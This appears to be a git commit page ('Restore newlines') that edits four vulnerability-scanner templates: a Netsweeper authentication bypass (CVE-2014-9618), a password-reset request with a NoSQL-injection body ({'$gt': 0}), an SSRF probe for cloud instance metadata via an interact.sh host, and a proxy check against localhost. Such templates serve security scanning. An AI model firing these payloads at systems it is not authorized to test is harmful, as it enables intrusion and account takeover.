Restore newlines

patch-1
sullo 2022-05-09 21:24:35 -04:00
parent 81e77d7423
commit 14423e1220
4 changed files with 10 additions and 1 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2014-9618
info:
name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
author: daffainfo
severity: critical
description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.

View File

@ -23,7 +23,9 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status

View File

@ -29,6 +29,7 @@ requests:
- |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- alibaba.interact.sh

View File

@ -21,21 +21,27 @@ requests:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
- |+
GET http://somethingthatdoesnotexist/ HTTP/1.1
Host: somethingthatdoesnotexist
- |+
GET http://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET https://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET http://localhost/ HTTP/1.1
Host: localhost
- |+
GET https://localhost/ HTTP/1.1
Host: localhost
unsafe: true
req-condition: true
stop-at-first-match: true